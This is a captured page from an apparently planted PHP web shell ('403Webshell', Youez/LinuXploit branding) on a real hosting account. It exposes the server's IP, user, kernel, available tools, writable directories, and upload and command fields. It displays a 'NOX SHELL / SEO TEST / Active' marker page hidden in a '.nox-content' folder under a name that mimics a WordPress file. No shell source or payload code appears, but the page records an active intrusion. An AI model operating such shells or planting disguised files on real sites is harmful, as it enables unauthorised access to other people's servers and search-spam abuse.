403Webshell
Server IP : 145.239.37.162  /  Your IP : 216.73.217.46
Web Server : Apache
System : Linux webm003.cluster130.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
User : verseaa ( 38250)
PHP Version : 7.4.33
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/verseaa/.nox-content/2cf91be9608e/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/verseaa/.nox-content/2cf91be9608e/wp-comments-post-loader.html
<!DOCTYPE html>
<html lang="tr">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="robots" content="noindex, nofollow">
<title>NOX SHELL</title>
<style>
  :root {
    --bg:          #060608;
    --surface:     #0F0F12;
    --border:      #1C1C22;
    --gold:        #B8925A;
    --gold-hi:     #D4AD70;
    --text:        #E8E4DC;
    --text-mid:    #807C76;
    --text-dim:    #28282E;
    --mono: 'Cascadia Code', 'SF Mono', Consolas, 'Courier New', monospace;
  }

  @media (prefers-color-scheme: light) {
    :root {
      --bg:       #F7F5F1;
      --surface:  #EFECEA;
      --border:   #DEDAD3;
      --gold:     #8A6530;
      --gold-hi:  #A07840;
      --text:     #1C1A18;
      --text-mid: #8C8880;
      --text-dim: #D4D0C8;
    }
  }

  :root[data-theme="dark"] {
    --bg:       #060608;
    --surface:  #0F0F12;
    --border:   #1C1C22;
    --gold:     #B8925A;
    --gold-hi:  #D4AD70;
    --text:     #E8E4DC;
    --text-mid: #807C76;
    --text-dim: #28282E;
  }

  :root[data-theme="light"] {
    --bg:       #F7F5F1;
    --surface:  #EFECEA;
    --border:   #DEDAD3;
    --gold:     #8A6530;
    --gold-hi:  #A07840;
    --text:     #1C1A18;
    --text-mid: #8C8880;
    --text-dim: #D4D0C8;
  }

  *, *::before, *::after { margin: 0; padding: 0; box-sizing: border-box; }

  body {
    background: var(--bg);
    color: var(--text);
    font-family: var(--mono);
    min-height: 100vh;
    display: flex;
    align-items: center;
    justify-content: center;
    position: relative;
    overflow: hidden;
  }

  /* Dot grid */
  body::before {
    content: '';
    position: fixed;
    inset: 0;
    background-image: radial-gradient(circle, var(--text-dim) 1px, transparent 1px);
    background-size: 28px 28px;
    pointer-events: none;
  }

  /* Radial vignette — erases the grid toward the edges */
  body::after {
    content: '';
    position: fixed;
    inset: 0;
    background: radial-gradient(ellipse 70% 70% at 50% 50%, transparent 20%, var(--bg) 100%);
    pointer-events: none;
  }

  /* ── Container ─────────────────────────────────────── */
  .shell {
    position: relative;
    z-index: 1;
    text-align: center;
    padding: 4rem 3rem;
    width: 100%;
    max-width: 640px;
    display: flex;
    flex-direction: column;
    align-items: center;
    gap: 0;
  }

  /* ── Eyebrow ─────────────────────────────────────── */
  .eyebrow {
    font-size: 0.6rem;
    letter-spacing: 0.45em;
    text-transform: uppercase;
    color: var(--gold);
    display: flex;
    align-items: center;
    gap: 1.25rem;
    margin-bottom: 2.75rem;
  }
  .eyebrow::before,
  .eyebrow::after {
    content: '';
    display: block;
    width: 36px;
    height: 1px;
    background: var(--gold);
    opacity: 0.45;
  }

  /* ── Wordmark ────────────────────────────────────── */
  h1 {
    font-size: clamp(5rem, 18vw, 8.5rem);
    font-weight: 200;
    letter-spacing: 0.3em;
    text-transform: uppercase;
    color: var(--text);
    line-height: 1;
    text-indent: 0.3em; /* compensate letter-spacing on last char */
    margin-bottom: 0.6rem;
  }

  /* ── Sub-label ───────────────────────────────────── */
  .sub {
    font-size: 0.6rem;
    letter-spacing: 0.55em;
    text-transform: uppercase;
    color: var(--text-mid);
    text-indent: 0.55em;
    margin-bottom: 3rem;
  }

  /* ── Gold stem ───────────────────────────────────── */
  .stem {
    width: 1px;
    height: 56px;
    background: linear-gradient(to bottom, var(--gold), transparent);
    margin-bottom: 3rem;
  }

  /* ── Status bar ──────────────────────────────────── */
  .status {
    display: flex;
    align-items: center;
    justify-content: center;
    gap: 0.875rem;
    font-size: 0.6rem;
    letter-spacing: 0.28em;
    text-transform: uppercase;
    color: var(--text-mid);
  }

  .dot {
    width: 5px;
    height: 5px;
    border-radius: 50%;
    background: var(--gold);
    flex-shrink: 0;
    animation: pulse 2.4s ease-in-out infinite;
  }

  .cursor {
    display: inline-block;
    width: 7px;
    height: 0.9em;
    background: var(--gold);
    vertical-align: middle;
    margin-left: 0.15em;
    animation: blink 1.1s step-end infinite;
  }

  @keyframes pulse {
    0%, 100% { opacity: 1; }
    50%       { opacity: 0.25; }
  }

  @keyframes blink {
    0%, 100% { opacity: 1; }
    50%       { opacity: 0; }
  }

  @media (prefers-reduced-motion: reduce) {
    .dot, .cursor { animation: none; }
  }
</style>
</head>
<body>
<main class="shell">
  <div class="eyebrow">SEO TEST</div>
  <h1>NOX</h1>
  <div class="sub">Shell &nbsp;/&nbsp; System</div>
  <div class="stem"></div>
  <div class="status">
    <span class="dot"></span>
    <span>Active</span>
    <span class="cursor"></span>
  </div>
</main>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit